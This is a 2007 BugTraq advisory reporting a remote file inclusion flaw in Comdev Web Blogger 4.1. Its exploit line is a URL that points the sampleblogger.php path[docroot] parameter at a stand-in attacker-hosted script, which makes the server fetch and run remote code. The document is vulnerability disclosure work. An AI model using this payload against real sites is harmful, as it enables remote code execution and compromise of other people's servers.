BugTraq
Comdev Web Blogger 4.1 RFI Vulnerability Jun 03 2007 01:42AM
johnnytalker hotmail com
########################################################################
###########################################################
#
# Comdev Web Blogger 4.1 RFI Vulnerability
#
########################################################################
###########################################################
# Infomation:-
#
# Scripts: Comdev Web Blogger
# Download: http://www.comdevweb.com/downloadfile.php?product=BLOGG41&url=http://sha
re.comdevweb.com/download/blogger-4.1.zip
# Version : 4.1
#
#
# Exploit :
#
# http://website/oneadmin/blogger/sampleblogger.php?path[docroot]=http://E
VILSCRIPT.txt?
#
########################################################################
###########################################################
#
# Discovered By : [L.T.C]
#
########################################################################
###########################################################

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus